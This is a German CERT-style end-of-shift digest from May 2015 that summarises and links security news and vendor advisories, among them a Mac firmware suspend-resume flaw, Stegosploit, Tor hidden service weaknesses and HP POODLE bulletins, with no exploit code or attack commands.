End-of-Shift report
Timeframe: Donnerstag 28-05-2015 18:00 − Freitag 29-05-2015 18:00
Handler: Stephan Richter
Co-Handler: n/a
The Empire Strikes Back Apple - how your Mac firmware security is completely broken
[...] What is that hole after all? Is Dark Jedi hard to achieve on Macs? No, it's extremely easy because Apple does all the dirty work for you. What the hell am I talking about? Well, Apple's S3 suspend-resume implementation is so f*cked up that they will leave the flash protections unlocked after a suspend-resume cycle.
https://reverse.put.as/2015/05/29/the-empire-strikes-back-apple-how-your-mac-firmware-security-is-completely-broken/
HITB Amsterdam Wrap-Up Day #1
The HITB crew is back in the beautiful city of Amsterdam for a new edition of their security conference. Here is my wrap-up for the first day! The opening keynote was assigned to Marcia Hofmann who worked for the EFF (the Electronic Frontier Foundation). Her keynote title was: "Fighting for Internet Security in the New Crypto Wars". EFF always fight for more privacy and she reviewed the history of encryption and...
http://blog.rootshell.be/2015/05/28/hitb-amsterdam-wrap-up-day-1-2/
Sicherheitslücken: Fehler in der Browser-Logik
Mit relativ simplen Methoden ist es dem 18-jährigen Webentwickler Bas Venis gelungen, schwerwiegende Sicherheitslücken im Chrome-Browser und im Flash-Plugin aufzudecken. Er ruft andere dazu auf, nach Bugs in der Logik von Browsern zu suchen.
http://www.golem.de/news/sicherheitsluecken-fehler-in-der-browser-logik-1505-114343-rss.html
Tor: Hidden Services leichter zu deanonymisieren
Das Tor-Protokoll erlaubt es Angreifern relativ einfach, die Kontrolle über die Verzeichnisserver sogenannter Hidden Services zu erlangen. Dadurch ist die Deanonymisierung von Traffic deutlich einfacher als beim Zugriff auf normale Webseiten.
http://www.golem.de/news/tor-hidden-services-leichter-zu-deanonymisieren-1505-114347.html
Crypto flaws in Blockchain Android app sent Bitcoins to the wrong address
A comedy of programming errors could prove catastrophic for affected users.
http://feeds.arstechnica.com/~r/arstechnica/security/~3/9dMUjIT6yyo/
ZyXEL schützt seine Router vor NetUSB-Lücke
Mit Sicherheits-Updates schließt der Netzwerkausrüster ZyXEL die kritische NetUSB-Lücke in allen betroffenen Modellen.
http://heise.de/-2671364
Lessons learned from Flame, three years later
Three years ago, on May 28th 2012, we announced the discovery of a malware known as Flame. Since that, we reported on many other advanced malware platform. Looking back at the discovery of Flame, here are some lessons we learned.
http://securelist.com/blog/opinions/70149/lessons-learned-from-flame-three-years-later/
Phishing Gang is Audacious Manipulator
Cybercriminals who specialize in phishing -- or tricking people into giving up usernames and passwords at fake bank and ecommerce sites -- arent generally considered the most sophisticated crooks, but occasionally they do exhibit creativity and chutzpah. Thats most definitely the case with a phishing gang that calls itself the "Manipulaters Team", whose Web site boasts that it specializes in brand research and development.
http://feedproxy.google.com/~r/KrebsOnSecurity/~3/qKqrwDK8oQ8/
A Drafty House: Analysis of the Current Use of AWS EC2 Security Groups
After a very confusing set of results from a survey we ran and exploring the new world of threat detection and incident response in AWS, we decided to go out and do a little research to see how the world was faring with the new security features in Amazon AWS. In short, we can safely say there is a good chunk of the EC2 users who left their front door open (actually with this analogy they also left their back door, side window, and garage open). Our analysis showed that users are: Using...
https://feeds.feedblitz.com/~/93538286/0/alienvault-blogs~A-Drafty-House-Analysis-of-the-Current-Use-of-AWS-EC-Security-Groups
Stegosploit hides malicious code in images, this is the future of online attacks
Stegosploit is the technique developed by the security researcher Saumil Shah that allows an attacker to embed executable JavaScript code within an image. The security researcher Saumil Shah from Net Square security has presented at Hack In The Box conference in Amsterdam his Stegosploit project which allows an attacker to embed executable JavaScript code within an...
http://securityaffairs.co/wordpress/37302/hacking/stegosploit-malware-images.html
Statistics on botnet-assisted DDoS attacks in Q1 2015
One popular DDoS scenario is a botnet-assisted attack. In Q1 2015, 23,095 botnet-assisted DDoS attacks were reported. These statistics refer to those botnets which were detected and analyzed by Kaspersky Lab.
http://securelist.com/blog/research/70071/statistics-on-botnet-assisted-ddos-attacks-in-q1-2015/
Linux Kernel __driver_rfc4106_decrypt() Buffer Overflow May Let Remote Users Execute Arbitrary Code
http://www.securitytracker.com/id/1032416
Pivotal Cloud Foundry directory traversal
http://xforce.iss.net/xforce/xfdb/103449
IBM Security Bulletins
https://www-304.ibm.com/connections/blogs/PSIRT/?lang=en_us
IBM Cognos Business Intelligence Developer 10.2.1 (backURL) Open Redirect
Input passed via the backURL GET parameter in /p2pd/servlet/dispatch is not properly verified before being used to redirect users. This can be exploited to redirect a user to an arbitrary website e.g. when a user clicks a specially crafted link to the affected script hosted on a trusted domain.
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5244.php
DSA-3274 virtualbox - security update
Jason Geffner discovered a buffer overflow in the emulated floppydisk drive, resulting in potential privilege escalation.
https://www.debian.org/security/2015/dsa-3274
IDS RTU 850 Directory Traversal Vulnerability
This advisory provides mitigation details for a directory traversal vulnerability in IDS RTU 850C.
https://ics-cert.us-cert.gov/advisories/ICSA-15-148-01
Security Notice - Statement on Security Researchers Revealing Security Issues on Huawei Products in HITB SecConf
May 29, 2015 17:47
http://www.huawei.com/en/security/psirt/security-bulletins/security-notices/hw-436642.htm
Security Notice-Statement on the Wooyun-disclosed XSS Vulnerability in Huawei Smartphone Browser
May 29, 2015 17:43
http://www.huawei.com/en/security/psirt/security-bulletins/security-notices/hw-436633.htm
SSL-TLS Implementations Cipher Block Chaining Padding Information Disclosure Vulnerability
http://tools.cisco.com/security/center/viewAlert.x?alertId=36740
HPSBGN03332 rev.1 - HP Operations Analytics running SSLv3, Remote Denial of Service (DoS), Disclosure of Information
A potential security vulnerability has been identified in HP Operations Analytics running SSLv3. This is the SSLv3 vulnerability known as "Padding Oracle on Downgraded Legacy Encryption" or "Poodle", which could be exploited remotely resulting in Denial of Service (DoS) or disclosure of information.
https://h20566.www2.hp.com/hpsc/doc/public/display?ac.admitted=1432904051426.876444892.199480143&docId=emr_na-c04676133
HPSBMU03267 rev.2 - HP Matrix Operating Environment and HP CloudSystem Matrix running OpenSSL, Remote Disclosure of Information
Potential security vulnerabilities have been identified with the HP Matrix Operating Environment and HP CloudSystem Matrix running OpenSSL. These vulnerabilities comprise the SSLv3 vulnerability known as "Padding Oracle on Downgraded Legacy Encryption" or "POODLE", which could be exploited remotely to allow disclosure of information.
https://h20566.www2.hp.com/hpsc/doc/public/display?ac.admitted=1432904065175.876444892.199480143&docId=emr_na-c04576624
HPSBMU03263 rev.3 - HP Insight Control running OpenSSL, Remote Disclosure of Information
Potential security vulnerabilities have been identified with HP Insight Control running OpenSSL. These vulnerabilities include the SSLv3 vulnerability known as "Padding Oracle on Downgraded Legacy Encryption" or "POODLE", which could be exploited remotely to allow disclosure of information.
https://h20566.www2.hp.com/hpsc/doc/public/display?ac.admitted=1432904087214.876444892.199480143&docId=emr_na-c04574073
HPSBMU03261 rev.2 - HP Systems Insight Manager running OpenSSL on Linux and Windows, Remote Disclosure of Information
Potential security vulnerabilities have been identified with HP Systems Insight Manager running OpenSSL on Linux and Windows. These vulnerabilities are related to the SSLv3 vulnerability known as "Padding Oracle on Downgraded Legacy Encryption" or "POODLE", which could be exploited remotely to allow disclosure of information.
https://h20566.www2.hp.com/hpsc/doc/public/display?ac.admitted=1432904104641.876444892.199480143&docId=emr_na-c04571454